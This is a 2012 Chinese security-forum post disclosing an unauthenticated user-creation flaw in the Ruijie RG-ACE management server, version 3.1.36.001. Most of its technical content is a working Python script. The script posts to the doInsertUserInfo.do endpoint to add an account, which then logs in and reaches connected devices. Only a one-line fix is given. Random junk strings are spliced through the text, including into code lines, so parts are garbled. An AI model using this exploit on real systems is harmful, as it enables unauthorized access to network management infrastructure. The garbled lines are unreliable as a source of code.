中国网络渗透测试联盟

标题: 锐捷应用控制引擎管理服务器可以增加用户 [打印本页]

---

作者: admin    时间: 2012-12-10 10:16
标题: 锐捷应用控制引擎管理服务器可以增加用户
锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
+ ?9 w1 t1 |; B6 T% o4 e* e

  \7 a) F/ j& l6 f/ k9 B0 ^测试的具体版本是
产品名称: 锐捷应用控制引擎
5 ]2 V  g% Y0 ?6 h/ ]  ]版本号: 3.1.36.001 TC
3 |( C& ^0 P3 Q/ U编译时间: 201104291730

: C1 j2 L4 k$ j& r
; r) |, D6 U! Q7 [/ ~' S& n漏洞证明：
* S/ r4 W8 q! @5 k7 `, a- U



# O7 f7 [" v- {3 ?9 @! L# V

执行脚本
. s8 P8 |9 H8 S& r, M% c& A#! /usr/bin/env python
& ^) k, R( m& C8 K7 `#coding=gbk
1 y, x$ A6 Q) S/ v#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
3 {& C2 f0 _2 n# j- b9 k6 ^+ e- Uurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
1 i: m% D' K- T$ qpost=(("event","userManager.doInsertUserInfo"),
("useractionname","addButtonValue"),
("useropermanager","userManager"),
("userName","t"), #######账号自己加
("pwd","aaaaaa"),######密码自己加
0 s: e8 x3 b4 W3 [2 H9 G) z("trueName","ad"),
( W$ R) h# s- T# T$ ^9 H9 `0 }("email",""),
" G1 \# p6 l  J# C6 S4 G("mobilePhone",""),
("officePhone",""),
("addr",""),
("submit","确定"))
8 n* g. c: A# K" K( r/ ]% v) Hurllib2.install_opener(opener)
: Q, ~9 s2 a# A* f0 d! lp=urllib2.urlopen(url, urllib.urlencode(post)).read()
print "Done"

! }) X2 R3 T0 T登录，连接设备

1 C9 Q( F9 z1 ~3 e3 w& L& X


9 B# l  Y1 M; P! c7 [( p% X* i% t
默认的管理员admin权限更大点
+ W" t4 Z4 l3 V% i

$ O. I" {8 J1 z  H0 x0 e$ F: y
( }1 c% F. Z7 {& v3 O

$ ~6 \7 w) |7 A3 @修复方案：
加强对接口的权限验证
6 k3 r2 z' P% \- N: z

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2